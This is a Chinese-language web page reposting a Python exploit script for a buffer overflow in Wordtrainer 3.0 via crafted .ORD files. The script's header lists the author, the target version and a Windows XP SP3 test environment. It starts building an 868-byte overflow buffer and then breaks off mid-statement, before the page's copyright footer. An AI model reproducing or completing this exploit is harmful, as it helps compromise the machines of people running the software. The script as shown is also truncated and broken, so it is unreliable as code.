# Wordtrainer 3.0 .ORD文件緩衝區溢出漏洞
==EXP==
#!/usr/bin/python
#
#[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability
#[+]Date: 12\04\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.wordtrainer.net/software/files/wt307shw_exe/wt307shw.exe
#[+]Version: 3.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
from struct import pack
from time import sleep
print """
Exploit Buffer Overflow Wordtrainer 3.0
Created BY C4SS!0 G0M3S
E-mail Louredo_@hotmail.com
Site www.exploit-br.org
"""
buf = ("\x41" * 868)
buf += pack('
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容